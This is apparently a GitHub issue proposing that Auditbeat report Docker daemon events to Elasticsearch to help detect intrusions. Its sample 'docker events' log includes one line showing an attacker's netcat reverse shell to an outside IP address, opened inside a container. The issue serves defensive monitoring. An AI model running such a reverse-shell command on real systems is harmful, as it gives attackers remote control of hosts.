[Auditbeat] Add support for reporting Docker events #6799
Description
The docker events utility can report the various Docker events that are happening.
In CLI terminal 1,
$ sudo docker exec -it kibana-container bash
$ sudo docker exec -it elasticsearch-container bash
$ sudo docker top kibana-container
<Attacker exploiting another application, and able to talk to a Docker daemon>
In CLI terminal 2,
# docker events
2018-04-07T21:13:06.015608218+05:30 container exec_create: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:06.022901891+05:30 container exec_start: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:34.756051931+05:30 container exec_create: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:13:34.763466352+05:30 container exec_start: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:20:11.095365653+05:30 container top 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:34:00.265485765+05:30 container exec_start: netcat 218.107.131.65 4444 -e /bin/bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
Reporting such Docker events to Elasticsearch via Auditbeat should help in detecting attacks (powered by CSRF, SSRF security flaws) and other intrusions against the Docker daemon (socket).
I learnt about this idea from @jeredding.
Metadata
Metadata
Assignees
Labels
Type
Fields
Give feedbackNo fields configured for issues without a type.